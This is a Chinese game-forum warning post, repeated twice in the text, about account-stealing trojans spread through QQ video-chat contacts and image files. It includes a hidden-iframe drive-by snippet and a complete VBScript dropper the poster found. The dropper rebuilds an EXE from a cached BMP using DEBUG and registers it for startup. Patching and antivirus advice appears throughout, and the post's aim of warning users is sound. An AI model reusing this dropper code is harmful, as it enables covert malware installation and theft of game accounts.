星星出品:解密加QQ盗号
刚刚y4025565这位朋友对某些区大话上的加QQ视频的人提出了疑问。
在电脑这次查点报废的情况下,斗胆给自己申请个精华。当了斑竹以后一次精华没拿过。也算死皮不要脸要一个。
先说一下现在比较流行的2种图片木马病毒。
第一种,老方法,就是把木马伪装成一个病毒,需要通过用户点击图片进而触发木马的下载,运作。
第二种,就是大家现在都担心的,无声无息就能入侵你电脑的图片病毒,不需要点击。这种病毒主要是利用了Windows的漏洞,把木马加载在图片中,只要没有打上相应补丁的电脑游览到这些图片的时候就会自动下载该图片信息中所包含的木马信息,进而达到木马种植功能
这个人就是利用了第二中方式。通过图片中加载木马的方式。无声无息使你的机器中木马。
防范方法就是把windows的漏洞堵上! 当然,因为这些漏洞不止Windows有,是很多软件都有,所以你需要把那些常会看到图片的软件的相关漏洞都打上补丁。例如QQ, MSN之类的软件也早在该jpg图片病毒公布之时发布了补丁。 大家可以去下载后打上。
解释一下图片木马的原理:
<iframe src=网马地址 width=0 height=0 frameborder=0>
这句话是htm的术语 说白了就是挂马专用的 可以在当前页面引进令一个页面
<img src=图片地址> htm里面的引用图片
所以建议大家禁止某些敏感脚本的运行。
图片这里假设是BMP文件
加他视频,他给你发一个windows的cmd命令脚本文件,你打开这个东西。他调用你电脑里的图片察看工具,自动察看BMP图片。你就中了他放在图片里的exe执行文件了。这就是BMP木马。BMP木马,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录.再编写一个脚本把找到的BMP文件用DEBUG还原成EXE,并把它放到注册表启动项中,在下一次开机时执行.但是这种技术只能在9X下发挥作用,对于2K,XP来说是无能为力了.
补丁地址:微软补丁以及相关介绍
http://www.microsoft.yzz.cn/china/security/Bulletins/200409_jpeg.mspx
腾讯QQ补丁:
http://im.qq.com/qq/mo.shtml?/download/qq2004.shtml
发贴以及查看网络上不熟悉的图片时,最好先打好GDI补丁。
附加:
我在这个图片中察看到的脚本文件:
Option Explicit
Dim FSO,WSH,CACHE,str
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache")
wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe"
SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"
WScript.Quit()
Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
File.Delete
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine("rcx")
Lt.WriteLine("1000")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp &"tmp.in>" & tmp & "tmp.out",false,6
On Error Resume Next
FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")
FSO.GetFile(tmp & "tmp.dat").Delete
FSO.GetFile(tmp & "tmp.in").Delete
FSO.GetFile(tmp & "tmp.out").Delete
end if
If Folder.SubFolders.Count <> 0 Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile SubFolder,fname
Next
End If
End Function
防范:
1。禁止几个敏感脚本。
2。打全补丁。
3。必要的杀毒软件。流氓软件清除软件(卡巴6和window优化大师我比较喜欢用)
4。敬告那些骚老爷们儿。别总等着天上掉下个林妹妹。扯淡。有那好事我就上了。还轮着你们?敬告卖身那些骚老娘们儿。你父母给你这身子是让你好好活着。不是让你来卖的。
附加没解密之前的样子。注意我画线的地方。稍微懂点计算机的人就应该看的出来问题。
最后一张图我画线的地方的右下脚大家注意到了没?
大话西游侵略者这几个字?
这是最明显的盗号木马。还~人也~女马~知道盗号是违法的
小心!!!
在电脑这次查点报废的情况下,斗胆给自己申请个精华。当了斑竹以后一次精华没拿过。也算死皮不要脸要一个。
先说一下现在比较流行的2种图片木马病毒。
第一种,老方法,就是把木马伪装成一个病毒,需要通过用户点击图片进而触发木马的下载,运作。
第二种,就是大家现在都担心的,无声无息就能入侵你电脑的图片病毒,不需要点击。这种病毒主要是利用了Windows的漏洞,把木马加载在图片中,只要没有打上相应补丁的电脑游览到这些图片的时候就会自动下载该图片信息中所包含的木马信息,进而达到木马种植功能
这个人就是利用了第二中方式。通过图片中加载木马的方式。无声无息使你的机器中木马。
防范方法就是把windows的漏洞堵上! 当然,因为这些漏洞不止Windows有,是很多软件都有,所以你需要把那些常会看到图片的软件的相关漏洞都打上补丁。例如QQ, MSN之类的软件也早在该jpg图片病毒公布之时发布了补丁。 大家可以去下载后打上。
解释一下图片木马的原理:
<iframe src=网马地址 width=0 height=0 frameborder=0>
这句话是htm的术语 说白了就是挂马专用的 可以在当前页面引进令一个页面
<img src=图片地址> htm里面的引用图片
所以建议大家禁止某些敏感脚本的运行。
图片这里假设是BMP文件
加他视频,他给你发一个windows的cmd命令脚本文件,你打开这个东西。他调用你电脑里的图片察看工具,自动察看BMP图片。你就中了他放在图片里的exe执行文件了。这就是BMP木马。BMP木马,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录.再编写一个脚本把找到的BMP文件用DEBUG还原成EXE,并把它放到注册表启动项中,在下一次开机时执行.但是这种技术只能在9X下发挥作用,对于2K,XP来说是无能为力了.
补丁地址:微软补丁以及相关介绍
http://www.microsoft.yzz.cn/china/security/Bulletins/200409_jpeg.mspx
腾讯QQ补丁:
http://im.qq.com/qq/mo.shtml?/download/qq2004.shtml
发贴以及查看网络上不熟悉的图片时,最好先打好GDI补丁。
附加:
我在这个图片中察看到的脚本文件:
Option Explicit
Dim FSO,WSH,CACHE,str
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache")
wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe"
SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"
WScript.Quit()
Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
File.Delete
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine("rcx")
Lt.WriteLine("1000")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp &"tmp.in>" & tmp & "tmp.out",false,6
On Error Resume Next
FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")
FSO.GetFile(tmp & "tmp.dat").Delete
FSO.GetFile(tmp & "tmp.in").Delete
FSO.GetFile(tmp & "tmp.out").Delete
end if
If Folder.SubFolders.Count <> 0 Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile SubFolder,fname
Next
End If
End Function
防范:
1。禁止几个敏感脚本。
2。打全补丁。
3。必要的杀毒软件。流氓软件清除软件(卡巴6和window优化大师我比较喜欢用)
4。敬告那些骚老爷们儿。别总等着天上掉下个林妹妹。扯淡。有那好事我就上了。还轮着你们?敬告卖身那些骚老娘们儿。你父母给你这身子是让你好好活着。不是让你来卖的。
附加没解密之前的样子。注意我画线的地方。稍微懂点计算机的人就应该看的出来问题。
最后一张图我画线的地方的右下脚大家注意到了没?
大话西游侵略者这几个字?
这是最明显的盗号木马。还~人也~女马~知道盗号是违法的
小心!!!
图片附件: 1.jpg (2007-3-9 04:38, 87.49 K)
图片附件: 2.jpg (2007-3-9 04:38, 90.95 K)
图片附件: 3.jpg (2007-3-9 04:38, 5.95 K)
图片附件: 4.jpg (2007-3-9 04:38, 42.14 K)
图片附件: 5.jpg (2007-3-9 04:38, 58.71 K)
图片附件: 6.jpg (2007-3-9 04:38, 31.91 K)
图片附件: 7.jpg (2007-3-9 04:38, 32.74 K)
图片附件: [注意这张图的右下角] 8.jpg (2007-3-9 04:46, 111.53 K)
图片附件: 9.jpg (2007-3-9 04:46, 108.86 K)
连接地址:http://bbs.yezizhu.yzz.cn.yzz.cn/viewthread.php?tid=932919&extra=page%3D1
本资讯及文章仅代表发表厂商及作者观点,不代表叶子猪本身观点
已有人对此文章评分
您的评分地址:
大话成功交易一览更多>>>
